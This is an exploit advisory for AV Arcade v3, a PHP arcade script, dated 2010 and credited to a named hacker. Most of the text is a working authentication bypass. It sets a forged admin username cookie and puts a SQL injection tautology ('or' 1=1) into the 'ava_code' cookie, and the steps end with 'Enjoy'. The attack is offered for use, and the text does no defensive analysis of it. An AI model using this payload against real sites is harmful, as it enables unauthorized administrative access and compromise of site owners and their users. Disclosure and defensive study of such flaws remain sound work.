AV Arcade version 3 suffers from insecure cookie and SQL injection vulnerabilities.
8e521695e01449c7661f2cb8f90b185012521a3a3fc71c1f2a2a3040bb131b5f
:----------------------------------------------------------------------------:
: # Software : AV Arcade v3 [PHP] :
: # Site : www.avscripts.net :
: # Date : 28/07/2010 :
: # Author : saudi0hacker :
: # Type : Auth Bypass / Cookie :
: # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:
[1] Go to the URL:
http://www.xxxxx.net/index.php?task=login
[2] Apply these Cookie:
Javascript:document.cookie = "ava_username=admin;"
Javascript:document.cookie = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"
[3] Go to main Page:
[4] Enjoy